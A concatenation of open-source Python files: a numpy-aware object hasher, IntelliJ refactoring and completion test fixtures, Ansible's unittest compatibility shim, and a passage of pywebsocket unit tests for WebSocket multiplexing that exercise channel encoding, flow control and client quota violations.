def _batch_setitems(self, items):
# forces order of keys in dict to ensure consistent hash
Pickler._batch_setitems(self, iter(sorted(items)))
def save_set(self, set_items):
# forces order of items in Set to ensure consistent hash
Pickler.save(self, _ConsistentSet(set_items))
dispatch[type(set())] = save_set
class NumpyHasher(Hasher):
""" Special case the hasher for when numpy is loaded.
"""
def __init__(self, hash_name='md5', coerce_mmap=False):
"""
Parameters
----------
hash_name: string
The hash algorithm to be used
coerce_mmap: boolean
Make no difference between np.memmap and np.ndarray
objects.
"""
self.coerce_mmap = coerce_mmap
Hasher.__init__(self, hash_name=hash_name)
# delayed import of numpy, to avoid tight coupling
import numpy as np
self.np = np
if hasattr(np, 'getbuffer'):
self._getbuffer = np.getbuffer
else:
self._getbuffer = memoryview
def save(self, obj):
""" Subclass the save method, to hash ndarray subclass, rather
            than pickling them. Of course, this is a total abuse of
the Pickler class.
"""
if isinstance(obj, self.np.ndarray) and not obj.dtype.hasobject:
# Compute a hash of the object:
try:
# memoryview is not supported for some dtypes,
# e.g. datetime64, see
# https://github.com/numpy/numpy/issues/4983. The
# workaround is to view the array as bytes before
# taking the memoryview
obj_bytes_view = obj.view(self.np.uint8)
self._hash.update(self._getbuffer(obj_bytes_view))
# ValueError is raised by .view when the array is not contiguous
# BufferError is raised by Python 3 in the hash update if
# the array is Fortran rather than C contiguous
except (ValueError, BufferError):
# Cater for non-single-segment arrays: this creates a
                # copy, and thus alleviates this issue.
# XXX: There might be a more efficient way of doing this
obj_bytes_view = obj.flatten().view(self.np.uint8)
self._hash.update(self._getbuffer(obj_bytes_view))
# We store the class, to be able to distinguish between
# Objects with the same binary content, but different
# classes.
if self.coerce_mmap and isinstance(obj, self.np.memmap):
# We don't make the difference between memmap and
# normal ndarrays, to be able to reload previously
# computed results with memmap.
klass = self.np.ndarray
else:
klass = obj.__class__
# We also return the dtype and the shape, to distinguish
# different views on the same data with different dtypes.
# The object will be pickled by the pickler hashed at the end.
obj = (klass, ('HASHED', obj.dtype, obj.shape, obj.strides))
Hasher.save(self, obj)
def hash(obj, hash_name='md5', coerce_mmap=False):
""" Quick calculation of a hash to identify uniquely Python objects
containing numpy arrays.
Parameters
-----------
hash_name: 'md5' or 'sha1'
Hashing algorithm used. sha1 is supposedly safer, but md5 is
faster.
coerce_mmap: boolean
Make no difference between np.memmap and np.ndarray
"""
if 'numpy' in sys.modules:
hasher = NumpyHasher(hash_name=hash_name, coerce_mmap=coerce_mmap)
else:
hasher = Hasher(hash_name=hash_name)
return hasher.hash(obj)
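# A minimal usage sketch (illustrative): dictionaries with the same contents hash
# to the same digest regardless of key insertion order, because _batch_setitems()
# sorts items before pickling them into the hash.
#
#     assert hash({'a': 1, 'b': 2}) == hash({'b': 2, 'a': 1})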
|
fengbaicanhe/intellij-community
|
refs/heads/master
|
python/testData/refactoring/inlinelocal/operatorPrecedence/bitwiseShift.after.py
|
79
|
(10 << 2)[::-5]
(10 << 2)[5]
(10 << 2)(5)
(10 << 2).foo
-(10 << 2)
+(10 << 2)
~(10 << 2)
5 ** (10 << 2)
(10 << 2) ** 5
5 * (10 << 2)
(10 << 2) * 5
5 / (10 << 2)
(10 << 2) / 5
5 // (10 << 2)
(10 << 2) // 5
5 + (10 << 2)
(10 << 2) + 5
(10 << 2) - 5
5 - (10 << 2)
5 >> 10 << 2
10 << 2 << 5
5 & 10 << 2
10 << 2 & 5
5 ^ 10 << 2
10 << 2 ^ 5
5 | 10 << 2
10 << 2 | 5
() in 10 << 2
10 << 2 in ()
5 is 10 << 2
10 << 2 is 5
5 < 10 << 2
10 << 2 < 5
not 10 << 2
5 and 10 << 2
10 << 2 and 5
5 or 10 << 2
10 << 2 or 5
10 << 2 if 10 << 2 else 10 << 2
|
bjoshua/ansible
|
refs/heads/devel
|
lib/ansible/compat/tests/unittest.py
|
375
|
# (c) 2014, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
'''
Compat module for Python2.7's unittest module
'''
import sys
# Python 2.6
if sys.version_info < (2, 7):
try:
# Need unittest2 on python2.6
from unittest2 import *
except ImportError:
print('You need unittest2 installed on python2.6.x to run tests')
else:
from unittest import *
|
michaelgallacher/intellij-community
|
refs/heads/master
|
python/testData/completion/fromNamespacePackageImport/a.after.py
|
83
|
from p1 import m1
|
xin3liang/platform_external_chromium-trace
|
refs/heads/master
|
trace-viewer/third_party/pywebsocket/src/test/test_mux.py
|
29
|
#!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for mux module."""
import Queue
import logging
import optparse
import unittest
import struct
import sys
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import common
from mod_pywebsocket import mux
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import parse_frame
import mock
class _OutgoingChannelData(object):
def __init__(self):
self.messages = []
self.control_messages = []
self.current_opcode = None
self.pending_fragments = []
class _MockMuxConnection(mock.MockBlockingConn):
"""Mock class of mod_python connection for mux."""
def __init__(self):
mock.MockBlockingConn.__init__(self)
self._control_blocks = []
self._channel_data = {}
self._current_opcode = None
self._pending_fragments = []
def write(self, data):
"""Override MockBlockingConn.write."""
self._current_data = data
self._position = 0
def _receive_bytes(length):
if self._position + length > len(self._current_data):
raise ConnectionTerminatedException(
'Failed to receive %d bytes from encapsulated '
'frame' % length)
data = self._current_data[self._position:self._position+length]
self._position += length
return data
opcode, payload, fin, rsv1, rsv2, rsv3 = (
parse_frame(_receive_bytes, unmask_receive=False))
self._pending_fragments.append(payload)
if self._current_opcode is None:
if opcode == common.OPCODE_CONTINUATION:
raise Exception('Sending invalid continuation opcode')
self._current_opcode = opcode
else:
if opcode != common.OPCODE_CONTINUATION:
raise Exception('Sending invalid opcode %d' % opcode)
if not fin:
return
inner_frame_data = ''.join(self._pending_fragments)
self._pending_fragments = []
self._current_opcode = None
parser = mux._MuxFramePayloadParser(inner_frame_data)
channel_id = parser.read_channel_id()
if channel_id == mux._CONTROL_CHANNEL_ID:
self._control_blocks.append(parser.remaining_data())
return
if not channel_id in self._channel_data:
self._channel_data[channel_id] = _OutgoingChannelData()
channel_data = self._channel_data[channel_id]
(inner_fin, inner_rsv1, inner_rsv2, inner_rsv3, inner_opcode,
inner_payload) = parser.read_inner_frame()
channel_data.pending_fragments.append(inner_payload)
if channel_data.current_opcode is None:
if inner_opcode == common.OPCODE_CONTINUATION:
raise Exception('Sending invalid continuation opcode')
channel_data.current_opcode = inner_opcode
else:
if inner_opcode != common.OPCODE_CONTINUATION:
raise Exception('Sending invalid opcode %d' % inner_opcode)
if not inner_fin:
return
message = ''.join(channel_data.pending_fragments)
channel_data.pending_fragments = []
if (channel_data.current_opcode == common.OPCODE_TEXT or
channel_data.current_opcode == common.OPCODE_BINARY):
channel_data.messages.append(message)
else:
channel_data.control_messages.append(
{'opcode': channel_data.current_opcode,
'message': message})
channel_data.current_opcode = None
def get_written_control_blocks(self):
return self._control_blocks
def get_written_messages(self, channel_id):
return self._channel_data[channel_id].messages
def get_written_control_messages(self, channel_id):
return self._channel_data[channel_id].control_messages
class _ChannelEvent(object):
"""A structure that records channel events."""
def __init__(self):
self.messages = []
self.exception = None
self.client_initiated_closing = False
class _MuxMockDispatcher(object):
"""Mock class of dispatch.Dispatcher for mux."""
def __init__(self):
self.channel_events = {}
def do_extra_handshake(self, request):
pass
def _do_echo(self, request, channel_events):
while True:
message = request.ws_stream.receive_message()
if message is None:
channel_events.client_initiated_closing = True
return
if message == 'Goodbye':
return
channel_events.messages.append(message)
# echo back
request.ws_stream.send_message(message)
def _do_ping(self, request, channel_events):
request.ws_stream.send_ping('Ping!')
def transfer_data(self, request):
self.channel_events[request.channel_id] = _ChannelEvent()
try:
# Note: more handlers will be added.
if request.uri.endswith('echo'):
self._do_echo(request,
self.channel_events[request.channel_id])
elif request.uri.endswith('ping'):
self._do_ping(request,
self.channel_events[request.channel_id])
else:
raise ValueError('Cannot handle path %r' % request.path)
if not request.server_terminated:
request.ws_stream.close_connection()
except ConnectionTerminatedException, e:
self.channel_events[request.channel_id].exception = e
except Exception, e:
self.channel_events[request.channel_id].exception = e
raise
def _create_mock_request():
headers = {'Host': 'server.example.com',
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': 'dGhlIHNhbXBsZSBub25jZQ==',
'Sec-WebSocket-Version': '13',
'Origin': 'http://example.com'}
request = mock.MockRequest(uri='/echo',
headers_in=headers,
connection=_MockMuxConnection())
request.ws_stream = Stream(request, options=StreamOptions())
request.mux = True
request.mux_extensions = []
request.mux_quota = 8 * 1024
return request
def _create_add_channel_request_frame(channel_id, encoding, encoded_handshake):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding')
block = mux._create_control_block_length_value(
channel_id, mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, encoding,
encoded_handshake)
payload = mux._encode_channel_id(mux._CONTROL_CHANNEL_ID) + block
return create_binary_frame(payload, mask=True)
def _create_logical_frame(channel_id, message, opcode=common.OPCODE_BINARY,
mask=True):
bits = chr(0x80 | opcode)
payload = mux._encode_channel_id(channel_id) + bits + message
return create_binary_frame(payload, mask=mask)
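# A note on the layout built above (an informal reading of the helper, not a
# restatement of the spec): the payload is the variable-length channel id,
# then one byte carrying FIN (0x80) ORed with the inner opcode, then the
# message body; the whole payload is wrapped in an outer WebSocket binary
# frame, masked by default as a client would send it. For example,
# _create_logical_frame(channel_id=2, message='Hi') wraps the payload
# '\x02\x82Hi' (0x82 == 0x80 | OPCODE_BINARY), assuming the single-byte
# channel id encoding exercised in test_channel_id_encode below.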
def _create_request_header(path='/echo'):
return (
'GET %s HTTP/1.1\r\n'
'Host: server.example.com\r\n'
'Upgrade: websocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n'
'Sec-WebSocket-Version: 13\r\n'
'Origin: http://example.com\r\n'
'\r\n') % path
class MuxTest(unittest.TestCase):
"""A unittest for mux module."""
def test_channel_id_decode(self):
data = '\x00\x01\xbf\xff\xdf\xff\xff\xff\xff\xff\xff'
parser = mux._MuxFramePayloadParser(data)
channel_id = parser.read_channel_id()
self.assertEqual(0, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 14 - 1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 21 - 1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 29 - 1, channel_id)
self.assertEqual(len(data), parser._read_position)
def test_channel_id_encode(self):
encoded = mux._encode_channel_id(0)
self.assertEqual('\x00', encoded)
encoded = mux._encode_channel_id(2 ** 14 - 1)
self.assertEqual('\xbf\xff', encoded)
encoded = mux._encode_channel_id(2 ** 14)
self.assertEqual('\xc0@\x00', encoded)
encoded = mux._encode_channel_id(2 ** 21 - 1)
self.assertEqual('\xdf\xff\xff', encoded)
encoded = mux._encode_channel_id(2 ** 21)
self.assertEqual('\xe0 \x00\x00', encoded)
encoded = mux._encode_channel_id(2 ** 29 - 1)
self.assertEqual('\xff\xff\xff\xff', encoded)
# channel_id is too large
self.assertRaises(ValueError,
mux._encode_channel_id,
2 ** 29)
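        # A reading of the expected values above (inferred from the test
        # vectors rather than quoted from the spec): the channel id is a
        # variable-length field whose leading bits select the width --
        # 0xxxxxxx is 1 byte (ids below 2 ** 7), 10xxxxxx plus 1 byte is
        # 2 bytes (14-bit ids), 110xxxxx plus 2 bytes is 3 bytes (21-bit
        # ids), 111xxxxx plus 3 bytes is 4 bytes (29-bit ids), and anything
        # at or above 2 ** 29 is rejected with ValueError.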
def test_create_control_block_length_value(self):
data = 'Hello, world!'
block = mux._create_control_block_length_value(
channel_id=1, opcode=mux._MUX_OPCODE_ADD_CHANNEL_REQUEST,
flags=0x7, value=data)
expected = '\x1c\x01\x0dHello, world!'
self.assertEqual(expected, block)
data = 'a' * (2 ** 8)
block = mux._create_control_block_length_value(
channel_id=2, opcode=mux._MUX_OPCODE_ADD_CHANNEL_RESPONSE,
flags=0x0, value=data)
expected = '\x21\x02\x01\x00' + data
self.assertEqual(expected, block)
data = 'b' * (2 ** 16)
block = mux._create_control_block_length_value(
channel_id=3, opcode=mux._MUX_OPCODE_DROP_CHANNEL,
flags=0x0, value=data)
expected = '\x62\x03\x01\x00\x00' + data
self.assertEqual(expected, block)
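        # One way to read the expected byte strings above (an inference from
        # the values themselves): the first byte packs the control opcode in
        # its top 3 bits, the flags in the next 3 bits, and (number of length
        # bytes - 1) in the low 2 bits. So '\x1c' is opcode 0
        # (AddChannelRequest) with flags 0x7 and a 1-byte length field, and it
        # is followed by the channel id, the length field and the value.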
def test_read_control_blocks(self):
data = ('\x00\x01\00'
'\x61\x02\x01\x00%s'
'\x0a\x03\x01\x00\x00%s'
'\x63\x04\x01\x00\x00\x00%s') % (
'a' * 0x0100, 'b' * 0x010000, 'c' * 0x01000000)
parser = mux._MuxFramePayloadParser(data)
blocks = list(parser.read_control_blocks())
self.assertEqual(4, len(blocks))
self.assertEqual(mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, blocks[0].opcode)
self.assertEqual(0, blocks[0].encoding)
self.assertEqual(0, len(blocks[0].encoded_handshake))
self.assertEqual(mux._MUX_OPCODE_DROP_CHANNEL, blocks[1].opcode)
self.assertEqual(0, blocks[1].mux_error)
self.assertEqual(0x0100, len(blocks[1].reason))
self.assertEqual(mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, blocks[2].opcode)
self.assertEqual(2, blocks[2].encoding)
self.assertEqual(0x010000, len(blocks[2].encoded_handshake))
self.assertEqual(mux._MUX_OPCODE_DROP_CHANNEL, blocks[3].opcode)
self.assertEqual(0, blocks[3].mux_error)
self.assertEqual(0x01000000, len(blocks[3].reason))
self.assertEqual(len(data), parser._read_position)
def test_create_add_channel_response(self):
data = mux._create_add_channel_response(channel_id=1,
encoded_handshake='FooBar',
encoding=0,
rejected=False)
self.assertEqual('\x82\x0a\x00\x20\x01\x06FooBar', data)
data = mux._create_add_channel_response(channel_id=2,
encoded_handshake='Hello',
encoding=1,
rejected=True)
self.assertEqual('\x82\x09\x00\x34\x02\x05Hello', data)
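        # Decoding the first expected string above under the same reading:
        # '\x82' '\x0a' is a FIN + binary WebSocket frame with a 10-byte
        # payload, '\x00' addresses the control channel, '\x20' is opcode 1
        # (AddChannelResponse) with no flags and a 1-byte length, '\x01' is
        # the target channel id, '\x06' the handshake length, then 'FooBar'.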
def test_drop_channel(self):
data = mux._create_drop_channel(channel_id=1,
reason='',
mux_error=False)
self.assertEqual('\x82\x04\x00\x60\x01\x00', data)
data = mux._create_drop_channel(channel_id=1,
reason='error',
mux_error=True)
self.assertEqual('\x82\x09\x00\x70\x01\x05error', data)
# reason must be empty if mux_error is False.
self.assertRaises(ValueError,
mux._create_drop_channel,
1, 'FooBar', False)
def test_parse_request_text(self):
request_text = _create_request_header()
command, path, version, headers = mux._parse_request_text(request_text)
self.assertEqual('GET', command)
self.assertEqual('/echo', path)
self.assertEqual('HTTP/1.1', version)
self.assertEqual(6, len(headers))
self.assertEqual('server.example.com', headers['Host'])
self.assertEqual('websocket', headers['Upgrade'])
self.assertEqual('Upgrade', headers['Connection'])
self.assertEqual('dGhlIHNhbXBsZSBub25jZQ==',
headers['Sec-WebSocket-Key'])
self.assertEqual('13', headers['Sec-WebSocket-Version'])
self.assertEqual('http://example.com', headers['Origin'])
class MuxHandlerTest(unittest.TestCase):
def test_add_channel(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=3, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=3,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Hello'))
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='World'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertEqual([], dispatcher.channel_events[1].messages)
self.assertEqual(['Hello'], dispatcher.channel_events[2].messages)
self.assertEqual(['World'], dispatcher.channel_events[3].messages)
# Channel 2
messages = request.connection.get_written_messages(2)
self.assertEqual(1, len(messages))
self.assertEqual('Hello', messages[0])
# Channel 3
messages = request.connection.get_written_messages(3)
self.assertEqual(1, len(messages))
self.assertEqual('World', messages[0])
control_blocks = request.connection.get_written_control_blocks()
# There should be 9 control blocks:
# - 1 NewChannelSlot
# - 2 AddChannelResponses for channel ids 2 and 3
# - 6 FlowControls for channel id 1 (initialize), 'Hello', 'World',
# and 3 'Goodbye's
self.assertEqual(9, len(control_blocks))
def test_add_channel_incomplete_handshake(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
incomplete_encoded_handshake = 'GET /echo HTTP/1.1'
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=incomplete_encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertTrue(1 in dispatcher.channel_events)
self.assertTrue(not 2 in dispatcher.channel_events)
def test_add_channel_invalid_version_handshake(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = (
'GET /echo HTTP/1.1\r\n'
'Host: example.com\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Key2: 12998 5 Y3 1 .P00\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'Upgrade: WebSocket\r\n'
'Sec-WebSocket-Key1: 4 @1 46546xW%0l 1 5\r\n'
'Origin: http://example.com\r\n'
'\r\n'
'^n:ds[4U')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertTrue(1 in dispatcher.channel_events)
self.assertTrue(not 2 in dispatcher.channel_events)
def test_receive_drop_channel(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
drop_channel = mux._create_drop_channel(channel_id=2,
outer_frame_mask=True)
request.connection.put_bytes(drop_channel)
# Terminate implicitly opened channel.
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
exception = dispatcher.channel_events[2].exception
self.assertTrue(exception.__class__ == ConnectionTerminatedException)
def test_receive_ping_frame(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=12,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
ping_frame = _create_logical_frame(channel_id=2,
message='Hello World!',
opcode=common.OPCODE_PING)
request.connection.put_bytes(ping_frame)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PONG, messages[0]['opcode'])
self.assertEqual('Hello World!', messages[0]['message'])
def test_send_ping(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/ping')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PING, messages[0]['opcode'])
self.assertEqual('Ping!', messages[0]['message'])
def test_two_flow_control(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
# Replenish 5 bytes.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
# Send 10 bytes. The server will try echo back 10 bytes.
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
# Replenish 5 bytes again.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_messages(2)
self.assertEqual(['HelloWorld'], messages)
def test_no_send_quota_on_server(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=1)
# No message should be sent on channel 2.
self.assertRaises(KeyError,
request.connection.get_written_messages,
2)
def test_quota_violation_by_client(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS, 0)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
control_blocks = request.connection.get_written_control_blocks()
# The first block is FlowControl for channel id 1.
# The next two blocks are NewChannelSlot and AddChannelResponse.
# The 4th or the 5th block should be a DropChannel for channel 2
# (the order of the last two blocks may vary).
# The remaining block should be FlowControl for 'Goodbye'.
self.assertEqual(5, len(control_blocks))
expected_opcode_and_flag = ((mux._MUX_OPCODE_DROP_CHANNEL << 5) |
(1 << 4))
self.assertTrue((expected_opcode_and_flag ==
(ord(control_blocks[3][0]) & 0xf0)) or
(expected_opcode_and_flag ==
(ord(control_blocks[4][0]) & 0xf0)))
def test_fragmented_control_message(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/ping')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
# Replenish total 5 bytes in 3 FlowControls.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=1,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=2,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=2,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PING, messages[0]['opcode'])
self.assertEqual('Ping!', messages[0]['message'])
def test_channel_slot_violation_by_client(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(slots=1,
send_quota=mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=10,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Hello'))
# This request should be rejected.
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=3, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=3,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='Hello'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
